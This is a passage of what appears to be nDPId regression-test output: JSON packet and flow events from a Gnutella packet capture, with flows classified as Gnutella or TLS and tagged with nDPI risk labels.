Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0sAAEAGN+GOhKUNCgACD3dmxIwAqPIB4YpKRGAS\/\/\/+CQAAAgQFtA=="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0wAAEAGSwNNOtM0CgACDw7exHgAqewBNESdzWAS\/\/\/ZhQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":90767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90767,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxkxAAIAG9OIKAAIPjoSlDcSMd2bhikpEAKjyAlAQ+vAa1gAA"} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":90768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90768,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoHOhAAIAGsWoKAAIPTTrTNMR4Dt40RJ3NAKnsAlAQ+vD2UQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":90768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90768,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA04AAEAG9E3Co7R+CgACDypJxJAAquYBYmFhZWAS\/\/97mQAAAgQFtA=="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSs1AAIAGLNIKAAIPwqO0fsSQKkliYWFlAKrmAlAQ+vCYZQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1AAAEAGZwW5u0qtCgACD9DxxI8Aq+ABnMSfU2AS\/\/\/VWAAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1EAAEAG4wi8pcu+CgACD1XrxI0ArNoBciGOTGAS\/\/8ODwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoOIRAAIAGsdQKAAIPubtKrcSP0PGcxJ9TAKvgAlAQ+vDyJAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxP5AAIAGoV4KAAIPvKXLvsSNVetyIY5MAKzaAlAQ+vAq2wAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1UAAEAGyRlYeEnXCgACD1\/yxH8ArdQBY7MtEWAS\/\/9f0wAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1YAAEAGK3HBIH7WCgACD+jMxI4Ars4ByU6XnmAS\/\/9vGAAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo+\/1AAIAGUHQKAAIPWHhJ18R\/X\/Jjsy0RAK3UAlAQ+vB8nwAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1cAAEAGVX5o7qz6CgACD1v8xIgAr8gBAIGaT2AS\/\/\/yGAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoYpBAAIAGTDoKAAIPwSB+1sSO6MzJTpeeAK7OAlAQ+vCL5AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":90777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90777,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBk9AAIAG0okKAAIPaO6s+sSIW\/wAgZpPAK\/IAlAQ+vAO5QAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA14AAEAG805VqCJpCgACD5vkxIAAsMIB8fB5WWAS\/\/+FlQAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA18AAEAG3PlXezbqCgACD9NyxH0AsbwBqI15YWAS\/\/+HEAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3DZAAIAGmnkKAAIPVagiacSAm+Tx8HlZALDCAlAQ+vCiYQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90785,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2AAAEAGnkMzRJnWCgACD2aNxJMAsrYBwo+\/QmAS\/\/9bRgAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAooEJAAIAGwBkKAAIPV3s26sR903KojXlhALG8AlAQ+vCj3AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoeOBAAIAGqMYKAAIPM0SZ1sSTZo3Cj79CALK2AlAQ+vB4EgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":90787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90787,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2cAAEAGHo9QB\/zACgACDxroxIoAs7ABAD7ueWAS\/\/\/AYAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":90787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90787,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoIw9AAIAGfuoKAAIPUAf8wMSKGugAPu55ALOwAlAQ+vDdLAAA"} -01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":90795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90795,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA24AAEAGymQugHJrCgACDxmyxHoAtKoBziHWF2AS\/\/++AAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":90796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90796,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoDztAAIAGPpsKAAIPLoBya8R6GbLOIdYXALSqAlAQ+vDazAAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":90799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90799,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3IAAEAGvK6khAoZCgACD9gGxJIAtaQBToGf\/mAS\/\/+tmgAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":90799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90799,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoptFAAIAGmVIKAAIPpIQKGcSS2AZOgZ\/+ALWkAlAQ+vDKZgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":90800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90800,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3YAAEAGCtCwY7AUCgACDxjKxIMAtp4BeVRy4GAS\/\/\/DVQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":90801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90801,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoGLRAAIAGdZUKAAIPsGOwFMSDGMp5VHLgALaeAlAQ+vDgIQAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 